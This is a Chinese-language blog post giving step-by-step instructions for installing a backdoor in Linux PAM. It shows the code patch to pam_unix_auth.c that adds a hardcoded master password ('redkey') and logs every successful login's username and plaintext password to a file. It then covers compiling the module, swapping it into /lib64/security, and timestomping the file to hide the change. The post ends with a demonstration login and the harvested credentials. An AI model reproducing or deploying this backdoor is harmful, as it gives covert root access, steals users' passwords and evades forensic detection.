Linux系统安全之pam后门安装使用详解

一.查看系统pam版本:

[root@redkey ~]# rpm -qa | grep pam
pam-1.1.1-4.el6.x86_64

二.下载对应版本的pam模块

http://www.linux-pam.org/library/

三.解压&修改pam_unix_auth.c文件

tar -xzvf Linux-PAM-1.1.1.tar.gz
cd Linux-PAM-1.1.1
cd modules/pam_unix/
vim pam_unix_auth.c

四.修改部分

在
PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags
                                  ,int argc, const char **argv)
{
定义:FILE *fp;如下:
PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags
                                   ,int argc, const char **argv)
{
        unsigned int ctrl;
        int retval, *ret_data = NULL;
        const char *name;
        const void *p;
        FILE *fp;
在retval = _unix_verify_password(pamh, name, p, ctrl); [约177行]下添加
/*password:”redkey”*/
if(strcmp(p,”redkey”)==0)
{
        retval = PAM_SUCCESS;
}
if(retval== PAM_SUCCESS)
{
/*pamfile:pamwd.txt*/
        fp=fopen(“pamwd.txt”,”a”);
        fprintf(fp,”%s::%s\n”,name,p);
        fclose(fp);
} 

五.编译

[root@redkey pam_unix]# cd ../../
[root@redkey Linux-PAM-1.1.1]# ./configure
[root@redkey Linux-PAM-1.1.1]# make

六.备份原有PAM模块

[root@redkey security]# mv pam_unix.so{,.bak}

七.复制新PAM模块到/lib64/security/目录下:

[root@redkey security]# cp /root/Linux-PAM-1.1.1/modules/pam_unix/.libs/pam_unix.so /lib64/security/

八.修改pam模块时间属性

[root@redkey security]# stat pam_unix.*
  File: “pam_unix.so”
  Size: 151879          Blocks: 304        IO Block: 4096   普通文件
Device: fd01h/64769d    Inode: 565261      Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2013-12-24 11:30:01.813610217 +0800
Modify: 2013-12-24 08:55:00.000000000 +0800
Change: 2013-12-24 11:29:12.747789015 +0800
  File: “pam_unix.so.bak”
  Size: 50752           Blocks: 104        IO Block: 4096   普通文件
Device: fd01h/64769d    Inode: 523660      Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2013-12-24 08:55:08.026835929 +0800
Modify: 2010-02-16 01:34:42.000000000 +0800
Change: 2013-12-24 10:42:11.741663207 +0800
[root@redkey security]# touch -t 201002160134 pam_unix.so
[root@redkey security]# ll pam_unix.*
-rwxr-xr-x  1 root root 151879  2月 16 2010 pam_unix.so
-rwxr-xr-x. 1 root root  50752  2月 16 2010 pam_unix.so.bak

九.万能密码登陆验证

login as: root
root@192.168.169.131’s password:
Last login: Tue Dec 24 11:10:16 2013 from 192.168.169.1
[root@redkey ~]#
[root@redkey /]# cat pamwd.txt
root::redkey
root::123456
root::12345678
root::redkey
root::redkey

  

posted on 2018-08-08 11:29  让编程成为一种习惯  阅读(4559)  评论(0编辑  收藏  举报